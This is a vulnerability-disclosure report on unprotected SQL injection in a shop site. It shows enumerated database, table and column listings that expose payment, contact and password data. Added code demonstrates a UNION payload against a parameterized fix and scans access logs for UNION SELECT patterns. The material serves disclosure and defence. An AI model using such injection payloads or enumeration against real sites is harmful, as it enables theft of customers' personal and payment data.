2015-12-14: Details sent to the vendor; awaiting vendor action
2015-12-18: Vendor confirmed; details visible to the vendor only
2015-12-28: Details disclosed to core white hats and relevant domain experts
2016-01-07: Details disclosed to regular white hats
2016-01-17: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public
As the title says: there is no protection against SQL injection at all, and part of the data may already have been dumped by black hats.
Take a look; it is a fairly large site.
Moreover, one injectable page, together with its payload, appears to have been crawled by Baidu, and the indexed URL can be opened directly as proof:
So a UNION query can be used to echo data back.
sqlmap choked on it, so I enumerated the databases by hand:
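The mechanism behind the UNION-based echo described above, as an added example that is not part of the original report: a request parameter spliced into the SQL text lets a value containing UNION append a second SELECT, so rows from a table the page never meant to expose come back alongside the expected rows. The same lookup with type validation and a bound placeholder returns nothing for that input. The schema and data are constructed for the demonstration (a product table plus a private member table), and the parameter value is a hypothetical one.

```python
import sqlite3

# Constructed in-memory schema for the demonstration (not the site's real data):
# a product table the page is meant to read, and a member table that must stay private.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER, name TEXT)")
    conn.execute("CREATE TABLE member (id INTEGER, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?)",
                     [(1, "koi food"), (2, "pond filter")])
    conn.executemany("INSERT INTO member VALUES (?, ?, ?)",
                     [(1, "alice@example.com", "hash-alice"),
                      (2, "bob@example.com", "hash-bob")])
    conn.commit()
    return conn

def lookup_vulnerable(conn, product_id: str):
    # Unsafe pattern: the request parameter becomes part of the SQL text, so a value
    # containing UNION appends a second SELECT whose rows come back with the product rows.
    sql = "SELECT id, name FROM product WHERE id = " + product_id
    return conn.execute(sql).fetchall()

def lookup_safe(conn, product_id: str):
    # Hardened pattern: validate the expected type, then bind the value with a placeholder.
    # The database engine receives the value as data, never as part of the statement.
    try:
        pid = int(product_id)
    except ValueError:
        return []
    return conn.execute("SELECT id, name FROM product WHERE id = ?", (pid,)).fetchall()

# Hypothetical attacker-controlled parameter of the kind the crawler indexed
UNION_PAYLOAD = "1 UNION SELECT email, password FROM member"

def demo():
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, UNION_PAYLOAD),   # product row + member rows
        "safe": lookup_safe(conn, UNION_PAYLOAD),               # [] : input rejected
        "normal": lookup_safe(conn, "1"),                       # [(1, 'koi food')]
    }

if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

The placeholder alone would already stop the injection; the int() check is kept because an id column should only ever receive an integer, and rejecting anything else turns a probe into a clean 4xx instead of a database error message.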
Table names in koi_db:
That is:
koi_db:
[+] activation
[+] address_name
[+] address_province
[+] adv
[+] alipay
[+] anwser
[+] banner
[+] banner_old
[+] banner_tmp
[+] banner_tmp_old
[+] bid
[+] bid_action
[+] bid_image
[+] bid_temp
[+] bid_title
[+] bid_title_old
[+] calendar
[+] category
[+] diary
[+] edm_campaign
[+] game
[+] game_content
[+] game_score
[+] game_score_content
[+] gift
[+] gift_action
[+] internal_photo
[+] internal_photo_content
[+] knowledge
[+] location
[+] mem_temp
[+] member
[+] news
[+] paypal_bid
[+] paypal_cart_info
[+] paypal_payment_info
[+] point_history
[+] product
[+] product_image
[+] question
[+] salesorder
[+] salesorder_items
[+] sc_main
[+] sc_users
[+] sms_verify
[+] staff
[+] table_forum
[+] table_log
[+] user_login
[+] votevideo
[+] votevideo_title
[+] votevideo_type
[+] votevideoact
[+] votevideoact_bak_20131129
[+] votevideoact_bak_20141229
The table names of the other databases can be obtained the same way:
koishop:
[+] wp_commentmeta
[+] wp_comments
[+] wp_formbuilder_fields
[+] wp_formbuilder_forms
[+] wp_formbuilder_pages
[+] wp_formbuilder_responses
[+] wp_formbuilder_results
[+] wp_formbuilder_tags
[+] wp_icl_content_status
[+] wp_icl_core_status
[+] wp_icl_currencies
[+] wp_icl_flags
[+] wp_icl_languages
[+] wp_icl_languages_translations
[+] wp_icl_locale_map
[+] wp_icl_message_status
[+] wp_icl_node
[+] wp_icl_reminders
[+] wp_icl_string_positions
[+] wp_icl_string_status
[+] wp_icl_string_translations
[+] wp_icl_strings
[+] wp_icl_translate
[+] wp_icl_translate_job
[+] wp_icl_translation_status
[+] wp_icl_translations
[+] wp_links
[+] wp_options
[+] wp_postmeta
[+] wp_posts
[+] wp_pronamic_ideal_configurations
[+] wp_pronamic_ideal_payments
[+] wp_term_relationships
[+] wp_term_taxonomy
[+] wp_terms
[+] wp_usermeta
[+] wp_users
[+] wp_vs_current_online_users
[+] wp_vs_overall_counter
[+] wp_woocommerce_attribute_taxonomies
[+] wp_woocommerce_downloadable_product_permissions
[+] wp_woocommerce_shipping_table_rates
[+] wp_woocommerce_shipping_zone_locations
[+] wp_woocommerce_shipping_zone_shipping_methods
[+] wp_woocommerce_shipping_zones
[+] wp_woocommerce_termmeta

pennydb:
[+] accounts
[+] addresses
[+] affiliate_codes
[+] affiliates
[+] answers
[+] auction_emails
[+] auctions
[+] autobids
[+] bidbutlers
[+] bids
[+] categories
[+] countries
[+] coupon_types
[+] coupons
[+] credits
[+] currencies
[+] departments
[+] genders
[+] image_defaults
[+] images
[+] integrals
[+] languages
[+] limits
[+] managers
[+] members
[+] messages
[+] news
[+] newsletters
[+] orders
[+] package_points
[+] packages
[+] pages
[+] points
[+] products
[+] questions
[+] referrals
[+] reminders
[+] rewards
[+] setting_increments
[+] settings
[+] smartbids
[+] sources
[+] statuses
[+] translations
[+] users
[+] watchlists
This suggests the data of three sites all lives in this one database server. Next, the column information:
koi_db:
[-] alipay
[+] trade_no
[+] paydate
[+] out_trade_no
[+] price
[+] subject
[+] body
[+] buyer_email
[+] receive_name
[+] receive_address
[+] receive_zip
[+] receive_phone
[+] receive_mobile
[+] trade_status
[+] trade_flag
[-] paypal_payment_info
[+] firstname
[+] lastname
[+] buyer_email
[+] street
[+] city
[+] state
[+] zipcode
[+] memo
[+] itemname
[+] itemnumber
[+] os0
[+] on0
[+] os1
[+] on1
[+] quantity
[+] paymentdate
[+] paymenttype
[+] txnid
[+] mc_gross
[+] mc_fee
[+] paymentstatus
[+] pendingreason
[+] txntype
[+] tax
[+] mc_currency
[+] mc_shipping
[+] reasoncode
[+] custom
[+] country
[+] datecreation

koishop:
[-] wp_users
[+] ID
[+] user_login
[+] user_pass
[+] user_nicename
[+] user_email
[+] user_url
[+] user_registered
[+] user_activation_key
[+] user_status
[+] display_name

pennydb:
[-] users
[+] id
[+] username
[+] password
[+] first_name
[+] last_name
[+] mobile
[+] date_of_birth
[+] gender_id
[+] email
[+] active
[+] key
[+] newsletter
[+] admin
[+] autobidder
[+] source_id
[+] source_extra
[+] tax_number
[+] phone_number
[+] bid_balance
[+] ip
[+] created
[+] modified
[+] sms_verified
[+] mem_active
[+] total_point
[+] mem_block
[+] mem_del
[+] total_cash_coupon
[+] mem_address
[+] USER
[+] CURRENT_CONNECTIONS
[+] TOTAL_CONNECTIONS
From the above you can see Alipay and PayPal payment records, user account passwords, e-mail addresses, mobile numbers and similar data. Screenshots follow as verification:
Set up a filtering policy, and prompt the administrator and users to change their passwords promptly (Baidu already returns the page with the UNION payload directly in its results).
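One concrete form the filtering advice above can take on the defensive side, as an added example that is not part of the original report: a scan over web server access logs that URL-decodes each query string and flags UNION ... SELECT sequences, including the percent-encoded and inline-comment-separated spellings, while ignoring ordinary text that merely contains the word "union". It also marks hits whose user agent looks like a crawler, because a search engine replaying an injecting URL is exactly the situation the report describes: the payload is already public and the password-reset advice becomes urgent. The log lines are constructed samples in Common Log Format; the IPs, paths and user agents are made up.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines in Common Log Format (not taken from the report).
SAMPLE_LOG = """\
203.0.113.10 - - [14/Dec/2015:10:00:01 +0800] "GET /news.php?id=12 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.11 - - [14/Dec/2015:10:00:02 +0800] "GET /news.php?id=12%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 5310 "-" "Mozilla/5.0"
203.0.113.12 - - [14/Dec/2015:10:00:03 +0800] "GET /news.php?id=12+union/**/all/**/select+null,null,null-- HTTP/1.1" 200 5400 "-" "Baiduspider/2.0"
203.0.113.13 - - [14/Dec/2015:10:00:04 +0800] "GET /about.php?q=union+membership HTTP/1.1" 200 2100 "-" "Mozilla/5.0"
"""

# Common Log Format with referrer and user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# UNION, optional ALL, then SELECT, separated by whitespace or inline /* */ comments.
SEP = r'(?:\s|/\*.*?\*/)+'
UNION_RE = re.compile(r'\bunion' + SEP + r'(?:all' + SEP + r')?select\b', re.IGNORECASE)

def normalise_query(target: str) -> str:
    # Decode percent-encoding and '+' so every encoding of a payload hits the same rule.
    return unquote_plus(urlsplit(target).query)

def looks_like_crawler(user_agent: str) -> bool:
    ua = user_agent.lower()
    return "spider" in ua or "bot" in ua

def scan_access_log(log_text: str):
    """Return one finding per request whose decoded query contains a UNION ... SELECT."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # unparseable line: skip rather than guess
        query = normalise_query(m.group("target"))
        if not UNION_RE.search(query):
            continue
        findings.append({
            "ip": m.group("ip"),
            "time": m.group("time"),
            "path": urlsplit(m.group("target")).path,
            "query": query,
            "user_agent": m.group("ua"),
            # A crawler replaying the payload means the injecting URL is already indexed.
            "crawler": looks_like_crawler(m.group("ua")),
        })
    return findings

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        flag = " (crawler: URL is public)" if f["crawler"] else ""
        print(f"{f['time']} {f['ip']} {f['path']} ?{f['query']}{flag}")
```

Run it over the real access log instead of SAMPLE_LOG to get the list of source addresses and the first time each payload was seen; the crawler flag tells you whether the exposure predates the log window, which decides whether a password reset is needed regardless of what the log shows.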
Severity: High
Vulnerability Rank: 13
Confirmed: 2015-12-18 11:05
Referred to related parties.
None yet.